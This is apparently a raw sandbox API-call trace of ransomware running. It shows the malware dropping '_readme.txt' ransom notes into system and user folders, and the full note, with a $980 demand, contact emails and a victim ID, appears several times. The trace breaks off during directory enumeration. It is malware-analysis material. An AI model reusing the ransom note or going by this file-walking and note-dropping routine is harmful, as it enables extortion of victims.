RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.862] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.863] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.863] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.864] CloseHandle (hObject=0x690) returned 1 [0173.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.864] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e6a2280, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e6a2280, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.865] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e6a2280, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e6a2280, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.865] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.865] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e6a2280, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e6a2280, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e6a2280, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.865] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e6a2280, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e6a2280, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e6a2280, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.865] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e108 [0173.865] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.865] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.868] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.868] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.868] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.868] PathFindFileNameW (pszPath="") returned="" [0173.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.868] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.869] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.869] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8ca68 [0173.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.869] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.869] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0173.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.869] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9dcd0 | out: hHeap=0x2c0000) returned 1 [0173.869] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0173.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9dcd0 [0173.877] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9dcd0 | out: hHeap=0x2c0000) returned 1 [0173.877] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19d49ca0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x19d49ca0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.877] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0173.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d048 [0173.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5ce90 [0173.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x3a59df8 [0173.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cff0 [0173.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5ce90 | out: hHeap=0x2c0000) returned 1 [0173.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5d048 | out: hHeap=0x2c0000) returned 1 [0173.878] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9ff10 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fea8 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x35773c0 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d048 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cff0 | out: hHeap=0x2c0000) returned 1 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fe40 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fea8 | out: hHeap=0x2c0000) returned 1 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9ff10 | out: hHeap=0x2c0000) returned 1 [0173.878] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1b8a99a0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1b8a99a0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cff0 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5ce90 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x3aa8c20 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c548 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9ff10 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5d048 | out: hHeap=0x2c0000) returned 1 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9fe40 | out: hHeap=0x2c0000) returned 1 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35773c0 | out: hHeap=0x2c0000) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d048 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5ce90 | out: hHeap=0x2c0000) returned 1 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cff0 | out: hHeap=0x2c0000) returned 1 [0173.878] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5cff0 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5ce90 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x353fef8 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c3e8 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3a9fe40 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5c6a8 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5c548 | out: hHeap=0x2c0000) returned 1 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9ff10 | out: hHeap=0x2c0000) returned 1 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5d048 | out: hHeap=0x2c0000) returned 1 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa8c20 | out: hHeap=0x2c0000) returned 1 [0173.878] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x3a5d048 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5ce90 | out: hHeap=0x2c0000) returned 1 [0173.878] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5cff0 | out: hHeap=0x2c0000) returned 1 [0173.878] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, 